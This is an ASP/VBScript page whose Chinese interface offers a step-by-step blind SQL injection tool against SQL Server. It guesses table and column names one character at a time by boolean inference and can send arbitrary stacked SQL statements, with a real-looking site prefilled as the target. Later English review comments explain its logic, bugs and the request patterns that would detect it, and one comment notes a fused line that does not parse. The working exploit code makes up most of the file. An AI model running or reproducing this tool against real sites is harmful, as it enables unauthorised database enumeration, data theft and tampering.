<%@ Language=VBscript %>
<%
' Raise the per-request script timeout far above the IIS default so the long probing loops
' further down the page are not cut off by the server.
Server.scriptTimeout=999999
' Suppress every runtime error for the rest of the page. Failed HTTP calls and non-numeric form
' values fall through silently, so the cases below cannot tell "no match" from "request failed".
on error resume next
' Fetch a URL with a synchronous HTTP GET and return the response body as text.
' url: the complete request URL, sent exactly as built by the caller (no encoding is applied here).
' Returns .ResponseText of the reply; with "on error resume next" active, a failed request
' presumably leaves the return value Empty rather than raising.
Function GetURL(url)
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
' Third argument False = synchronous; user and password are passed empty.
.Open "GET", url, False, "", ""
.Send
GetURL = .ResponseText
End With
Set Retrieval = Nothing
' NOTE(review): "End Function" and the following assignment are fused onto one line in this copy;
' as written the line does not parse, which looks like an extraction artifact rather than the
' original layout. "on error resume next" does not cover parse-time errors.
End Functionother = request.form("other")
' Keep the comma-separated list of already-known table names in the session. The posted value only
' replaces the stored list once a session value already exists; on a fresh session the default pair
' is stored instead and the posted value is discarded. This session value is later interpolated
' both into a SQL fragment and, unencoded, into the page markup (textarea and hidden input).
if session("other")<>"" then
session("other")=other
else
other="'Table1','Table2'"
session("other")=other
end if
%>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
body,td,input {
font-size: 12px;
margin-left: 0px;
margin-top: 0px;
}
table,textarea {
border: 1px solid #003366;
}
body {
margin-right: 0px;
margin-bottom: 0px;
}
.style1 {color: #FFFFFF}
-->
</style>
<title>ASP版SQLSERVER注射数据表结构猜解机----自个研究吧</title></HEAD>
<BODY>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" style="color:#ff0000"><span id="showinfo"></span></td>
</tr>
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">第一步:猜解表名的长度</span></td>
</tr>
<form method="post" action="" name="Form1">
<tr>
<td height="26" align="center" title="格式:'table1','table2' 猜解出一个表就在后面加上,以此类推"><textarea name="other" cols="105" rows="9" wrap="VIRTUAL"><%=session("other")%></textarea></td>
</tr>
<tr>
<td height="26" align="center"><input name="action" value="lentable" type="hidden">action
<input name="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="35">
位数:
<input name="len1" id="len1" value="1" size="3">
-
<input name="len2" id="len2" value="20" size="3">
正确关键字:
<input name="keyword" id="keyword" value="<hr" size="20">
<input type="submit" name="Submit" value="猜解表名长度"></td>
</tr>
</form>
<form method="post" action="" name="Form2">
<input name="action" value="cracktable" type="hidden">
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">第二步:猜解表名的名称</span></td>
</tr>
<tr>
<td height="26" align="center" valign="baseline">
action
<input name="actionurl" id="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="60">
正确关键字
<input name="keyword" id="keyword" value="<hr" size="20"><br>
<input name="other" type="hidden" value="<%=session("other")%>">
破解位数范围:
<input name="len1" value="<%=request.form("len1")%>" size="5">
-
<input name="len2" value="<%=request.form("len2")%>" size="5">
ASCII范围:
<input name="asc1" value="47" size="5">-
<input name="asc2" value="122" size="5">
<input type="submit" name="Submit" value="开始猜解数据表名称">
</td>
</tr></form>
<form method="post" action="" name="Form3">
<input name="action" value="lencols" type="hidden">
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">第三步:猜解表
<input name="tablename" value="<%=request.form("tablename")%>" size="20">
的第
<input name="coln" id="coln" value="<%=request.form("coln")%>" size="5">
个字段名长度 </span></td>
</tr>
<tr>
<td height="26" align="center">action
<input name="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="40">
LEN:
<input name="len1" value="1" size="3">
-
<input name="len2" value="20" size="3">
正确关键字:
<input name="keyword" id="keyword" value="<hr" size="15">
<input type="submit" name="Submit" value="猜解字段长度"></td>
</tr>
</form>
<form method="post" action="" name="Form4">
<input name="action" value="crackcols" type="hidden">
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">第四步:猜解表
<input name="tablename" value="<%=request.form("tablename")%>" size="20">
的第
<input name="coln" id="coln" value="<%=request.form("coln")%>" size="5">
个字段名名称</span></td>
</tr>
<tr>
<td height="26"> action
<input name="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="26">
LEN:
<input name="len1" value="1" size="3">
-
<input name="len2" value="20" size="3">
ASCII:
<input name="asc1" value="47" size="4">
-
<input name="asc2" value="122" size="4">
正确关键字
<input name="keyword" id="keyword" value="<hr" size="15">
<input type="submit" name="Submit" value="猜解字段名称"></td>
</tr> </form>
<form method="post" action="" name="Form5">
<input name="action" value="exesql" type="hidden">
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">
可以在下面输入要执行的SQL语句</span></td>
</tr>
<tr>
<td height="26"><span class="style1">
</span> 注入地址:<span class="style1">
<input name="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="65">
<input name="keyword" id="keyword" value="<hr" size="20">
<input type="submit" name="Submit" value="执行SQL语句">
</span></td>
</tr>
<tr>
<td height="26"><span class="style1">
</span> SQL语句:
<span class="style1">
<input name="sqlstr" size="110">
</span></td>
</tr>
</form>
</table>
</BODY>
</HTML>
<%
' Dispatch on the hidden "action" field posted by one of the five forms above. Every case appends a
' SQL fragment to the user-supplied "actionurl", fetches the result with GetURL, and treats the
' presence of the posted "keyword" in the response body as the true/false signal (boolean inference).
' No value read from request.form is validated or encoded before being placed into the probe URL.
' Detection note: the literal fragments assembled below (sysobjects / xtype='u', col_name(object_id(,
' ascii(substring(, exists(, and the trailing "--") appear verbatim in the query string of every probe,
' and each loop issues one request per candidate value, so a run is visible as a long burst of
' near-identical requests differing only in a trailing number.
action=request.form("action")
select case action
case "cracktable"
' Numeric bounds for the ASCII scan and the character positions. clng raises on non-numeric input;
' with "on error resume next" (set at the top of the page) that error is swallowed and the variable
' is left Empty, so the loops below silently run with unexpected bounds.
asc1=clng(request.form("asc1"))
asc2=clng(request.form("asc2"))
len1=clng(request.form("len1"))
len2=clng(request.form("len2"))
actionurl=request.form("actionurl")
' Probe pieces: URL1 & position & URL2 & ascii value & URL3. trim(session("other")) is spliced in
' raw, so whatever the session holds becomes part of the fragment.
URL1 = actionurl & " and ascii(substring((select top 1 name from sysobjects where xtype='u' and status>0 and name not in("&trim(session("other"))&")),"
URL2=",1))="
URL3 = "--"
KEY1 = request.form("keyword")
' Outer loop walks character positions, inner loop walks the ASCII range; the first hit for a
' position is streamed to the browser and the inner loop stops. A position with no hit is skipped
' silently, so the streamed result can be shorter than the real name.
for ii = len1 to len2
for i=asc1 to asc2
TakenHTML = GetURL(URL1&ii&URL2&i&URL3)
' NOTE(review): this case and "lentable" test InStr(...) > 1, while "lencols", "crackcols" and
' "exesql" test > 0; a keyword found at position 1 counts as "not found" here only, presumably
' unintended. When GetURL returned Empty, InStr yields 0 and the miss is indistinguishable.
if InStr(TakenHTML,KEY1) > 1 then
' Chr(i) is written into a JavaScript string literal without escaping; a backslash (92, inside the
' default 47-122 range) would break the literal.
Response.Write "<script>showinfo.innerHTML+='"& Chr(i) &"';</script>"
Response.Flush
exit for
end if
next
next
Response.Write "<script>showinfo.innerHTML+='破解完成';</script>"
Response.Flush
case "lentable"
' Same input handling as above; only a length range, keyword and URL are used.
len1=clng(request.form("len1"))
len2=clng(request.form("len2"))
KEY1 = request.form("keyword")
actionurl=request.form("actionurl")
' Probe: URL1 & candidate length & URL2.
URL1 = actionurl & " and len((select top 1 name from sysobjects where xtype='u' and status>0 and name not in("&trim(session("other"))&")))="
URL2 = "--"
' One request per candidate length; the current candidate is echoed to the page before each probe.
for i=len1 to len2
TakenHTML = GetURL(URL1&i&URL2)
Response.Write "<script>showinfo.innerHTML=" & i & ";</script>"
Response.Flush
' See the "> 1" / "> 0" inconsistency noted in the "cracktable" case.
if InStr(TakenHTML,KEY1) > 1 then
Response.Write "<script>showinfo.innerHTML='表名长度为" & i & "个字符';</script>"
Response.Flush
exit for
end if
next
case "lencols"
' tablename is spliced raw into a quoted string in the probe; coln selects the column ordinal.
tablename = request.form("tablename")
coln = clng(request.form("coln"))
len1=clng(request.form("len1"))
len2=clng(request.form("len2"))
KEY1 = request.form("keyword")
actionurl=request.form("actionurl")
' Probe: URL1 & tablename & URL2 & coln & URL3 & candidate length & URL4.
URL1 = actionurl & " and len((select top 1 col_name(object_id('"
URL2 = "'),"
URL3 = ")))="
URL4 = "--"
for i=len1 to len2
TakenHTML = GetURL(URL1&tablename&URL2&coln&URL3&i&URL4)
Response.Write "<script>showinfo.innerHTML=" & i & ";</script>"
Response.Flush
if InStr(TakenHTML,KEY1) > 0 then
Response.Write "<script>showinfo.innerHTML='字段名长度为" & i & "个字符';</script>"
Response.Flush
exit for
end if
next
case "crackcols"
' Character-by-character scan of one column name; same loop shape as "cracktable".
tablename = request.form("tablename")
coln = clng(request.form("coln"))
len1=clng(request.form("len1"))
len2=clng(request.form("len2"))
asc1=clng(request.form("asc1"))
asc2=clng(request.form("asc2"))
KEY1 = request.form("keyword")
actionurl=request.form("actionurl")
' Probe: URL1 & tablename & URL2 & coln & URL3 & position & URL4 & ascii value & URL5.
URL1 = actionurl & " and ascii(substring((select top 1 col_name(object_id('"
URL2 = "'),"
URL3 = ")),"
URL4 = ",1))="
URL5 = "--"
for ii = len1 to len2
for i=asc1 to asc2
TakenHTML = GetURL(URL1&tablename&URL2&coln&URL3&ii&URL4&i&URL5)
if InStr(TakenHTML,KEY1) > 0 then
' Chr(i) is again inserted into a JavaScript string literal unescaped.
Response.Write "<script>showinfo.innerHTML+='" & Chr(i) & "';</script>"
Response.Flush
exit for
end if
next
next
Response.Write "<script>showinfo.innerHTML+='破解完成';</script>"
Response.Flush
case "exesql"
' Free-form statement from the form. A statement containing "select" (case-insensitive) is wrapped
' in exists(); anything else is sent as a stacked statement between ";" and ";--". The only feedback
' is whether the keyword appears in the response, so "success" here means only that the page still
' rendered the keyword, not that the statement did what was intended.
sqlstr = request.form("sqlstr")
actionurl=request.form("actionurl")
KEY1 = request.form("keyword")
if instr(LCase(sqlstr),"select")>0 then
URL1 = actionurl & " and exists("&sqlstr&")--"
else
URL1 = actionurl & ";"&sqlstr&";--"
end if
TakenHTML = GetURL(URL1)
if InStr(TakenHTML,KEY1) > 0 then
Response.Write "<script>showinfo.innerHTML='语句执行成功';</script>"
Response.Flush
else
Response.Write "<script>showinfo.innerHTML='语句执行失败';</script>"
Response.Flush
end if
end select
%>